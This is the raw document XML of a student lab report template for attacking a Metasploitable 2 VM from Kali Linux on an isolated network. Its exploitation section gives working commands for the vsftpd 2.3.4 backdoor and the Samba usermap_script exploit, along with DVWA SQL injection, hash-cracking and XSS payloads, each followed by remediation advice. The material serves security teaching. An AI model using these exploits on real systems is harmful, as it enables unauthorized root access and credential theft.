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52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Testing Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux  →  Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="10"/>
        </w:pBd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Setup, Exploitation, and Remediation Report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Name:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">______________________________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Course / Section:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">______________________________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Instructor:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">______________________________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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">______________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="700"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope &amp; Authorization</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="BF9000" w:sz="8" w:space="6"/>
          <w:bottom w:val="single" w:color="BF9000" w:sz="8" w:space="6"/>
          <w:left w:val="single" w:color="BF9000" w:sz="8" w:space="6"/>
          <w:right w:val="single" w:color="BF9000" w:sz="8" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="FFF2CC" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All testing in this report was performed against the author's own Metasploitable 2 virtual machine on an isolated host-only network. Metasploitable 2 and DVWA are intentionally vulnerable systems built for training. Performing these techniques against any system without ownership or written authorization is illegal.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Part I — Lab Setup (Steps 1–3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The lab consists of two virtual machines on an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">isolated host-only network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: an attacker VM (Kali Linux) and an intentionally vulnerable target VM (Metasploitable 2). Host-only networking keeps all traffic between the VMs and the host, so testing never reaches the real network or the internet.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Step 1 — Hypervisor</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="93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36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 OS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53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Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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VMware Workstation Pro (free) or VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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Download with school email from the Broadcom portal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Linux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VMware Workstation Pro or VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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macOS (Apple Silicon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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UTM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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x86 VMware/VirtualBox images do not run well on ARM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macOS (Intel)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VMware Fusion or VirtualBox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="45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BIOS/UEFI hint: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if VMs will not start, enable CPU virtualization — Intel VT-x or AMD-V (“SVM Mode”). On Windows, disabling Hyper-V / Memory Integrity can resolve conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">32- vs 64-bit: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nearly all modern machines are 64-bit. Confirm with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (x86_64 / arm64 = 64-bit) and download the 64-bit images.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Step 2 — Install Kali Linux (attacker)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Download the pre-built VM image from kali.org/get-kali → Virtual Machines, matching your hypervisor.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Extract the archive and open the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.vmx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (VMware) or import the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.ova</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (VirtualBox).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 the network adapter to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before first boot.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Log in: modern images use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">kali / kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; older images used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">root / toor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Elevate with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify Kali's host-only IP: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ip a        # note Kali's host-only IP, e.g. 192.168.56.101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Step 3 — Install Metasploitable 2 (target) &amp; reach DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploitable 2 ships as a pre-built virtual disk — you attach it, you do not install an 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Download Metasploitable 2 (Rapid7 / SourceForge) and extract the zip.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VMware: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">File → New VM → Custom → install OS later → Linux/Ubuntu 64-bit → Network </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → Use an existing virtual disk → select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable.vmdk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (keep child .vmdk files together).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VirtualBox: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">New → Linux/Ubuntu 64-bit → use existing disk → then set Adapter 1 to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host-only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Crash fix (VMware): </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if it keeps crashing, VM Settings → Display → turn off “Accelerate 3D graphics” (3D video support).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Log in at the console with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">msfadmin / msfadmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find the target IP and confirm the two VMs can see each other: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On Metasploitable 2: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ifconfig          # eth0 -&gt; inet addr, e.g. 192.168.56.102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On Kali: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ping -c 3 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From Kali's Firefox, browse to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">http://&lt;TARGET_IP&gt;/dvwa/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and log in with the default DVWA credentials </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">admin / password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. A successful login (captured in Part II, Figure 1) confirms the environment is ready.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Part II — Attack Report (Step 4)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1. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Testing followed the standard phases of a penetration test, scaled to this lab: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Reconnaissance / scanning </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— discover the host, open ports, and service versions.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Enumeration </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— identify specific vulnerable services and web applications.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Exploitation </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— demonstrate attacks that yield access or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Analysis &amp; remediation </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— explain the root cause and how to fix each weakness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All commands run from Kali. Replace the target IP with your own (from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):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TARGET=192.168.56.102   # set to your Metasploitable 2 IP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2. Reconnaissance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2.1  DVWA reachable — Step 3 proof</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browsing to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">http://TARGET/dvwa/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from Kali and logging in with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">admin / password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> confirms the web stack is live and the VMs share the host-only network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
          <w:bottom w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
          <w:left w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
          <w:right w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="808080"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[ INSERT SCREENSHOT HERE ]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
          <w:right w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Insert &gt; Pictures &gt; step3-dvwa-login.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
          <w:left w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
          <w:right w:val="dashed" w:color="808080" w:sz="8" w:space="20"/>
        </w:pBdr>
        <w:shd w:fill="F2F2F2" w:color="auto" w:val="clear"/>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(captured on your machine with both VMs running)</w:t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Figure 1 — Successful DVWA login on Metasploitable 2 (default credentials admin / password).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2.2  Port &amp; service scan (nmap)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nmap -sV -sC -p- -T4 $TARGET -oN nmap-full.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploitable 2 deliberately exposes a large attack surface. A typical scan reveals:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="93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43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43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Notable issue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vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Backdoored version (CVE-2011-2523)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OpenSSH 4.7p1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Old; brute-forceable accounts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telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Cleartext login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Apache 2.2.8 / PHP 5.2.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Hosts DVWA, Mutillidae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139/445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Samba 3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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usermap_script RCE (CVE-2007-2447)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3306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MySQL 5.0.51a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Blank / weak root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5900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VNC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Password: password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6667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UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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Backdoor (CVE-2010-2075)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Save your own scan to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap-full.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and cite the exact versions you observe — they justify each exploit below.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3. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three attacks spanning different vulnerability classes are demonstrated below: a network-service backdoor, a service-configuration RCE, and a web-application injection.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3.1  vsftpd 2.3.4 backdoor (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A tampered release of vsftpd 2.3.4 opened a root shell on port 6200 whenever a username containing “:)” was submitted.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Manual trigger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nc $TARGET 21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USER test:)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 test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second terminal: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nc $TARGET 6200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id        # -&gt; uid=0(root)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Via Metasploit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msfconsole -q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 exploit/unix/ftp/vsftpd_234_backdoor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set RHOSTS $TARGET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run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root cause: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a malicious maintainer backdoor shipped in the source tarball. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unauthenticated root RCE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">install only from verified repositories, verify GPG signatures/hashes, and patch services.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3.2  Samba usermap_script command injection (CVE-2007-2447)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Samba 3.0.20–3.0.25rc3 passed the username to /bin/sh when a username-map script was configured, so shell metacharacters in the username executed as root.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msfconsole -q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 exploit/multi/samba/usermap_script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set RHOSTS $TARGET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set LHOST &lt;KALI_IP&gt;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run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id; uname -a   # -&gt; root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root cause: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unsanitized user input interpolated into a shell command. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unauthenticated root RCE over SMB. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">patch Samba; never build shell commands from untrusted input; drop daemon privileges.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3.3  Web-app injection via DVWA (ties back to Step 3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">With DVWA security set to Low, two classic web flaws are demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(a) SQL injection </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— in the User ID field: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1' OR '1'='1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dump password hashes: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1' UNION SELECT user, password FROM users -- -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crack the unsalted MD5 hashes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1F3864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hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt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# admin -&gt; 5f4dcc3b5aa765d61d8327deb882cf99 -&gt; "password"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(b) Reflected XSS </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— in the Name field:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1F3864" w:sz="18" w:space="6"/>
        </w:pBd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&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root cause: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">user input concatenated into SQL / HTML without parameterization or output encoding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">database exfiltration, credential theft, session hijacking. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prepared statements, context-aware output encoding, a Content-Security-Policy header, and salted hashing (bcrypt/argon2).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4. Findings Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="93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000"/>
        <w:gridCol w:w="2300"/>
        <w:gridCol w:w="1536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 gained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="153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vsftpd 2.3.4 backdoor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FTP (21/6200)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Samba usermap_script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SMB (445)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root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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DVWA SQLi + XSS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 (80)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="23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DB dump, cookie theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="153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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root causes across the target: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unpatched/backdoored software, default and weak credentials, cleartext protocols, and missing input validation / output encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Top defensive takeaways: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Patch and update; obtain software from trusted, signature-verified sources.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Remove default accounts; enforce strong, unique credentials; disable unused services.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Replace cleartext services (telnet, r-services) with encrypted equivalents (SSH).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 parameterized queries and output encoding in web apps; add CSP.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Segment the network and restrict service exposure (least privilege, firewalling).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5. Appendix — Evidence Checklist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Figure 1 — DVWA login screenshot (required).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8"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap-full.txt </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— full scan output.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msfconsole / nc exploit transcripts.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 + Metasploitable 2 Lab Report</dc:title>
  <dc:creator>Lab Report</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-11T22:53:35.135Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-11T22:53:35.145Z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